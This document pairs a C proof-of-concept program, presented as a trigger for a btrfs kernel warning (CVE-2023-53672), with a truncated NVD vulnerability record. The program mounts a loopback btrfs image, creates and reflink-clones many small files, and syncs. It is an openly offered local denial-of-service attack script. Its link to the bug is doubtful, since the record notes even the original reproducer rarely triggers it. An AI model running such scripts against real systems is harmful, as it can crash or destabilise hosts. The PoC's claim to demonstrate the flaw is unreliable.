CVE-2023-53672

// CVE-2023-53672 PoC - btrfs inline backref lookup failure trigger // This PoC demonstrates the vulnerability by triggering the WARN_ON() // in lookup_inline_extent_backref() through btrfs filesystem operations. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #define BTRFS_DEVICE "/tmp/btrfs_test.img" #define MOUNT_POINT "/tmp/btrfs_mnt" #define IMG_SIZE (512 * 1024 * 1024) // 512MB int main() { int fd, ret; // Step 1: Create a sparse file to use as btrfs device fd = open(BTRFS_DEVICE, O_CREAT | O_WRONLY | O_TRUNC, 0644); if (fd < 0) { perror("open"); return 1; } // Truncate to create sparse file if (ftruncate(fd, IMG_SIZE) < 0) { perror("ftruncate"); close(fd); return 1; } close(fd); // Step 2: Create mount point mkdir(MOUNT_POINT, 0755); // Step 3: Format with btrfs printf("Formatting btrfs filesystem...\n"); ret = system("mkfs.btrfs -f " BTRFS_DEVICE); if (ret != 0) { fprintf(stderr, "Failed to format btrfs\n"); return 1; } // Step 4: Mount btrfs printf("Mounting btrfs...\n"); ret = mount(BTRFS_DEVICE, MOUNT_POINT, "btrfs", 0, NULL); if (ret != 0) { perror("mount"); return 1; } // Step 5: Create files and perform operations to trigger inline backref lookup printf("Creating test files...\n"); char path[256]; for (int i = 0; i < 100; i++) { snprintf(path, sizeof(path), "%s/testfile_%d", MOUNT_POINT, i); fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644); if (fd < 0) continue; // Write small data to trigger inline extent creation const char *data = "test data for inline extent"; write(fd, data, strlen(data)); // Clone the file to trigger backref operations char clone_path[256]; snprintf(clone_path, sizeof(clone_path), "%s/clone_%d", MOUNT_POINT, i); // Use reflink/clone operations to trigger backref manipulation int src_fd = open(path, O_RDONLY); int dst_fd = open(clone_path, O_CREAT | O_WRONLY | O_TRUNC, 0644); if (src_fd >= 0 && dst_fd >= 0) { // ioctl with FICLONE to trigger reflink ioctl(dst_fd, _IOW(0x94, 9, int), src_fd); close(dst_fd); } if (src_fd >= 0) close(src_fd); close(fd); } // Step 6: Force sync to trigger extent tree operations printf("Syncing filesystem...\n"); sync(); // Step 7: Cleanup printf("Unmounting and cleaning up...\n"); umount(MOUNT_POINT); rmdir(MOUNT_POINT); unlink(BTRFS_DEVICE); printf("Done. Check dmesg for WARN_ON() output.\n"); return 0; }

{"cve": {"id": "CVE-2023-53672", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:51.123", "lastModified": "2026-02-26T23:14:54.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: output extra debug info if we failed to find an inline backref\n\n[BUG]\nSyzbot reported several warning triggered inside\nlookup_inline_extent_backref().\n\n[CAUSE]\nAs usual, the reproducer doesn't reliably trigger locally here, but at\nleast we know the WARN_ON() is triggered when an inline backref can not\nbe found, and it can only be triggered when @insert is true. (I.e.\ninserting a new inline backref, which means the backref should already\nexist)\n\n[ENHANCEMENT]\nAfter the WARN_ON(), dump all the parameters and the extent tree\nleaf to help debug."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.9.1", "versionEndExcluding": "4.14.326", "matchCriteriaId": "55A7CDF1-F424-4508-BC44-0AAB20436EE7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.295", "matchCriteriaId": "D419C7D6-F33D-4EF8-8950-1CB5DDF6A55D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.257", "matchCriteriaId": "834BD148-28EC-43A4-A4F5-458124A1E39F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.197", "matchCriteriaId": "FD17EA9A-DF74-4876-AADC-C204F0716961"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.133", "matchCriteriaId": "21236FF3-9B2C-4C1A-8780-BC5BCA44AA51"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.55", "matchCriteriaId": "0EFCF8E8-5528-46B9-8C17-B09792899CE0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.5", "matchCriteriaId": "8CF71E85-DA24-4925-95C5-E5C15DA71AE6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:-:*:*:*:*:*:*", "matchCriteriaId": "526A1838-B777-4270-82B2-E8BC398CB046"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "matchCriteriaId": "5B039196-7159-476C-876A-C61242CC41DA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "matchCriteriaId": "3A9E0457-53C9-44DD-ACFB-31EE1D1E060E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "matchCriteriaId": "BEE406E7-87BA-44BA-BF61-673E6CC44A2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "matchCriteriaId": "29FBA173-658F-45DC-8205-934CACD67166"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "matchCriteriaId": "139700F0-BA32-40CF-B9DF-C9C450384FDE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.9:rc8:*:*:*:*:*:*", "matchCriteriaId": "7FC798CC-23F1-42C3-BA27-187C90B4E43C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/28062cd6eda04035d8f6ded2001292ac8b496149", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/376b41524b71e494514720bd6114325b0a2ed19c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/400e08a16604b534fdd82c5a288fa150d04f5f79", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6994f806c6d1ae8b59344d3700358547f3b3fe1d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7afbfde45d665953b4d5a42a721e15bf0315d89b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7f72f50547b7af4ddf985b07fc56600a4deba281", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patc ... (truncated)